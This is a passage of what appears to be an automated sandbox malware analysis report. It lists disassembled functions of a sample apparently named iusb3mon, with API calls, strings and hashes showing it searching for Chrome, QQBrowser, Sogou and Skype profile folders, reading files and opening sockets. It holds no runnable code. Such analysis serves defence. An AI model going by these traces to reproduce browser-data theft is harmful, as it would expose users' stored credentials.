                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Eventsetsockopt$CancelExchangeInterlockedIoctlResetclosesocketconnectgethostbynamehtonssocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4281462294-0
                                                                                                                    • Opcode ID: 8740adb573cb1ebb61ae595d591e70b0130f6f84cdc55d214e4d2b8d05794ec1
                                                                                                                    • Instruction ID: 8be86116eb7aa3cb24fdd0e9bf7c5afca33fd11f5479cf317c902bbb53c3e339
                                                                                                                    • Opcode Fuzzy Hash: 8740adb573cb1ebb61ae595d591e70b0130f6f84cdc55d214e4d2b8d05794ec1
                                                                                                                    • Instruction Fuzzy Hash: 7731E871910309BFDB209FA4DC89DAEBBBDFF04354F004515F651A6190C7719A54DB60
                                                                                                                    Function 06244D89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 06244DBD
                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 06244E10
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 06244E21
                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 06244E3C
                                                                                                                      • Part of subcall function 06244D3F: LocalAlloc.KERNEL32(00000040,?), ref: 06244D52
                                                                                                                      • Part of subcall function 06244D3F: LocalFree.KERNEL32(00000000,00000000,?), ref: 06244D7A
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 06244E59
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Local$AllocCloseCreateFolderFreeHandlePathReadSizeSpecial
                                                                                                                    • String ID: .dat
                                                                                                                    • API String ID: 3272996501-100240174
                                                                                                                    • Opcode ID: be3de2ecaaf16cfa10acb8af61610b5029db86aed8a5a2259b33ae81a73cbd13
                                                                                                                    • Instruction ID: 17d1868a1afb254f73b03678a9f707ece38503ff0741133cdd1419040d98f832
                                                                                                                    • Opcode Fuzzy Hash: be3de2ecaaf16cfa10acb8af61610b5029db86aed8a5a2259b33ae81a73cbd13
                                                                                                                    • Instruction Fuzzy Hash: D2219571D5030CBAEB65AAA49C8AFDF7B7DEB08344F0005A5F714E2140D6B09A848B60
                                                                                                                    Function 062443C6 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77stringprocessCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 062491B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00000000), ref: 06249216
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 0624922E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 0624923E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 0624924E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 0624925B
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06249268
                                                                                                                      • Part of subcall function 062491B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062493F3
                                                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 06244421
                                                                                                                    • lstrcpyA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 06244446
                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0624448C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Library$CreateFreeLoadProcesslstrcpylstrlen
                                                                                                                    • String ID: Applications\iexplore.exe\shell\open\command$D$WinSta0\Default
                                                                                                                    • API String ID: 326945973-490771695
                                                                                                                    • Opcode ID: bacab98272abc6c1fc7b19690166cf967594886a1a64dc83d004e4eedbe9dd90
                                                                                                                    • Instruction ID: 0dbb57d8da92101c5ddb55f6cca1257e5f3a4659c4b17b9793ee19ec2fccab87
                                                                                                                    • Opcode Fuzzy Hash: bacab98272abc6c1fc7b19690166cf967594886a1a64dc83d004e4eedbe9dd90
                                                                                                                    • Instruction Fuzzy Hash: 24119372911629AADBA4AAE1DC4CFDF7BBCFF40791F004411BE09E6140DA749685CBA0
                                                                                                                    Function 001E1001 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,001D23D4,?,5EE195CD,?,001E110E,000000FF,001ED604,001D23D4,00000000), ref: 001E10C2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                    • API String ID: 3664257935-537541572
                                                                                                                    • Opcode ID: 7ad8c3b3bd875214edd249dbd8ecc3ddd2d5821ddb8cc76e7497f24881adda6b
                                                                                                                    • Instruction ID: efc59df39accf8c5a5424945236669617cb3f13c668dfecf3dec2082b25f7963
                                                                                                                    • Opcode Fuzzy Hash: 7ad8c3b3bd875214edd249dbd8ecc3ddd2d5821ddb8cc76e7497f24881adda6b
                                                                                                                    • Instruction Fuzzy Hash: 0721E472E01BD0BBC7229B62EC84A6F3BA9DB517A0F250214F905A7291D770EDC0CAD0
                                                                                                                    Function 06253F94 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 06253FD2
                                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 06253FEA
                                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 06253FF1
                                                                                                                    • lstrcpyA.KERNEL32(?,DISPLAY), ref: 06254015
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: System$Metrics$InfoParameterslstrcpy
                                                                                                                    • String ID: B$DISPLAY
                                                                                                                    • API String ID: 1409579217-3316187204
                                                                                                                    • Opcode ID: 82bf76f7fcf4d4c0f0c10b2f1f952f186cdf425906fb78d94d6afc076093acdf
                                                                                                                    • Instruction ID: 3c41a306c2dd5ff23e738ecf45f9e26f6b57e7aa425e2b5d5386d921c439ebb0
                                                                                                                    • Opcode Fuzzy Hash: 82bf76f7fcf4d4c0f0c10b2f1f952f186cdf425906fb78d94d6afc076093acdf
                                                                                                                    • Instruction Fuzzy Hash: 9C110671910320AFDB61AF64DC88A9BBFE8EF18741B124052ED059E046D7B1D580CBA0
                                                                                                                    Function 06244796 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0624479B
                                                                                                                      • Part of subcall function 06243441: __EH_prolog.LIBCMT ref: 06243446
                                                                                                                      • Part of subcall function 06243441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0624345C
                                                                                                                      • Part of subcall function 06243441: Process32First.KERNEL32(00000000,?), ref: 06243475
                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 062447C9
                                                                                                                      • Part of subcall function 062587FB: lstrlenA.KERNEL32(?), ref: 0625883F
                                                                                                                      • Part of subcall function 06258633: __EH_prolog.LIBCMT ref: 06258638
                                                                                                                      • Part of subcall function 062585BF: __EH_prolog.LIBCMT ref: 062585C4
                                                                                                                      • Part of subcall function 062584B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 062584C5
                                                                                                                    • Sleep.KERNEL32(000003E8,?,00000000,\AppData\Local\Google\Chrome\User Data\Default,?,C:\Users\,?), ref: 06244825
                                                                                                                      • Part of subcall function 06242E2C: __EH_prolog.LIBCMT ref: 06242E31
                                                                                                                      • Part of subcall function 06242E2C: FindFirstFileA.KERNEL32(?,?), ref: 06242EBF
                                                                                                                      • Part of subcall function 06242E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06242F7F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
                                                                                                                    • String ID: C:\Users\$\AppData\Local\Google\Chrome\User Data\Default$chrome.exe
                                                                                                                    • API String ID: 12226711-2559963756
                                                                                                                    • Opcode ID: c26f003b2de82292947f24b67518856f20ed1b8d9e3fa1e5ccbc4dd429692b9b
                                                                                                                    • Instruction ID: ce019919bf23c7ba5ac6967f05b627e92d7046d8170e48666a036488f8dbf37c
                                                                                                                    • Opcode Fuzzy Hash: c26f003b2de82292947f24b67518856f20ed1b8d9e3fa1e5ccbc4dd429692b9b
                                                                                                                    • Instruction Fuzzy Hash: C211D671D60319EADB95EBE0DC46FEE77B8AF14700F100155BE21B20C0DBB85B088B61
                                                                                                                    Function 06244A1D Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 06244A22
                                                                                                                      • Part of subcall function 06243441: __EH_prolog.LIBCMT ref: 06243446
                                                                                                                      • Part of subcall function 06243441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0624345C
                                                                                                                      • Part of subcall function 06243441: Process32First.KERNEL32(00000000,?), ref: 06243475
                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 06244A50
                                                                                                                      • Part of subcall function 062587FB: lstrlenA.KERNEL32(?), ref: 0625883F
                                                                                                                      • Part of subcall function 06258633: __EH_prolog.LIBCMT ref: 06258638
                                                                                                                      • Part of subcall function 062585BF: __EH_prolog.LIBCMT ref: 062585C4
                                                                                                                      • Part of subcall function 062584B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 062584C5
                                                                                                                    • Sleep.KERNEL32(000003E8,?,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,?,C:\Users\,?), ref: 06244AAC
                                                                                                                      • Part of subcall function 06242E2C: __EH_prolog.LIBCMT ref: 06242E31
                                                                                                                      • Part of subcall function 06242E2C: FindFirstFileA.KERNEL32(?,?), ref: 06242EBF
                                                                                                                      • Part of subcall function 06242E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06242F7F
                                                                                                                    Strings
                                                                                                                    • C:\Users\, xrefs: 06244A7D
                                                                                                                    • QQBrowser.exe, xrefs: 06244A33
                                                                                                                    • \AppData\Local\Tencent\QQBrowser\User Data\Default, xrefs: 06244A88
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
                                                                                                                    • String ID: C:\Users\$QQBrowser.exe$\AppData\Local\Tencent\QQBrowser\User Data\Default
                                                                                                                    • API String ID: 12226711-2662846904
                                                                                                                    • Opcode ID: 97c15049b0f8a38463929f73a10a399a66d660bbb9325b12168ac44960bb771c
                                                                                                                    • Instruction ID: e16dd1b8a72b8a03c33c0ad14b025166cd137680e3d013c3b404fc722c693103
                                                                                                                    • Opcode Fuzzy Hash: 97c15049b0f8a38463929f73a10a399a66d660bbb9325b12168ac44960bb771c
                                                                                                                    • Instruction Fuzzy Hash: F8118E71960219AADBA5EBE0DD46FEEB7B8AF14300F114155FE21B21C0DBB85B488A61
                                                                                                                    Function 06244AE3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 06244AE8
                                                                                                                      • Part of subcall function 06243441: __EH_prolog.LIBCMT ref: 06243446
                                                                                                                      • Part of subcall function 06243441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0624345C
                                                                                                                      • Part of subcall function 06243441: Process32First.KERNEL32(00000000,?), ref: 06243475
                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 06244B16
                                                                                                                      • Part of subcall function 062587FB: lstrlenA.KERNEL32(?), ref: 0625883F
                                                                                                                      • Part of subcall function 06258633: __EH_prolog.LIBCMT ref: 06258638
                                                                                                                      • Part of subcall function 062585BF: __EH_prolog.LIBCMT ref: 062585C4
                                                                                                                      • Part of subcall function 062584B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 062584C5
                                                                                                                    • Sleep.KERNEL32(000003E8,?,00000000,\AppData\Roaming\SogouExplorer,?,C:\Users\,?), ref: 06244B72
                                                                                                                      • Part of subcall function 06242E2C: __EH_prolog.LIBCMT ref: 06242E31
                                                                                                                      • Part of subcall function 06242E2C: FindFirstFileA.KERNEL32(?,?), ref: 06242EBF
                                                                                                                      • Part of subcall function 06242E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06242F7F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
                                                                                                                    • String ID: C:\Users\$SogouExplorer.exe$\AppData\Roaming\SogouExplorer
                                                                                                                    • API String ID: 12226711-2055279553
                                                                                                                    • Opcode ID: cb0c5c92778738459887c96575890a903a466eafe2fe71b03bcb17fd2eead325
                                                                                                                    • Instruction ID: 3fee9f5b9eea5c9868e837fc55210da5b47143dddb93306cb1e54fd493f201c8
                                                                                                                    • Opcode Fuzzy Hash: cb0c5c92778738459887c96575890a903a466eafe2fe71b03bcb17fd2eead325
                                                                                                                    • Instruction Fuzzy Hash: 5E11BE71960329EADBA5EBE0DC46FEEB7B8AF14300F100115BE21B20C0DBB85B048A61
                                                                                                                    Function 06244BA9 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 06244BAE
                                                                                                                      • Part of subcall function 06243441: __EH_prolog.LIBCMT ref: 06243446
                                                                                                                      • Part of subcall function 06243441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0624345C
                                                                                                                      • Part of subcall function 06243441: Process32First.KERNEL32(00000000,?), ref: 06243475
                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 06244BDC
                                                                                                                      • Part of subcall function 062587FB: lstrlenA.KERNEL32(?), ref: 0625883F
                                                                                                                      • Part of subcall function 06258633: __EH_prolog.LIBCMT ref: 06258638
                                                                                                                      • Part of subcall function 062585BF: __EH_prolog.LIBCMT ref: 062585C4
                                                                                                                      • Part of subcall function 062584B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 062584C5
                                                                                                                    • Sleep.KERNEL32(000003E8,?,00000000,\AppData\Local\Google\Chrome\User Data\Default,?,C:\Users\,?), ref: 06244C38
                                                                                                                      • Part of subcall function 06242E2C: __EH_prolog.LIBCMT ref: 06242E31
                                                                                                                      • Part of subcall function 06242E2C: FindFirstFileA.KERNEL32(?,?), ref: 06242EBF
                                                                                                                      • Part of subcall function 06242E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06242F7F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
                                                                                                                    • String ID: C:\Users\$\AppData\Local\Google\Chrome\User Data\Default$chrome.exe
                                                                                                                    • API String ID: 12226711-2559963756
                                                                                                                    • Opcode ID: a72105e49ef130c93663f9e02d26cc0a21366e3381c791a27b22faaeb66ffb2c
                                                                                                                    • Instruction ID: db267c7c8934a3d963e6d64ffa5cfa2eab2523abceaffb21fc70dd99d55dbe30
                                                                                                                    • Opcode Fuzzy Hash: a72105e49ef130c93663f9e02d26cc0a21366e3381c791a27b22faaeb66ffb2c
                                                                                                                    • Instruction Fuzzy Hash: 1D11B471D60319EADB95EBE0DC46FEE77B8AF14300F100155BE21B20C0DBB85B088A61
                                                                                                                    Function 0624485C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 06244861
                                                                                                                      • Part of subcall function 06243441: __EH_prolog.LIBCMT ref: 06243446
                                                                                                                      • Part of subcall function 06243441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0624345C
                                                                                                                      • Part of subcall function 06243441: Process32First.KERNEL32(00000000,?), ref: 06243475
                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 0624488F
                                                                                                                      • Part of subcall function 062587FB: lstrlenA.KERNEL32(?), ref: 0625883F
                                                                                                                      • Part of subcall function 06258633: __EH_prolog.LIBCMT ref: 06258638
                                                                                                                      • Part of subcall function 062585BF: __EH_prolog.LIBCMT ref: 062585C4
                                                                                                                      • Part of subcall function 062584B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 062584C5
                                                                                                                    • Sleep.KERNEL32(000003E8,?,00000000,\AppData\Roaming\Microsoft\Skype for Desktop,?,C:\Users\,?), ref: 062448EB
                                                                                                                      • Part of subcall function 06242E2C: __EH_prolog.LIBCMT ref: 06242E31
                                                                                                                      • Part of subcall function 06242E2C: FindFirstFileA.KERNEL32(?,?), ref: 06242EBF
                                                                                                                      • Part of subcall function 06242E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06242F7F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
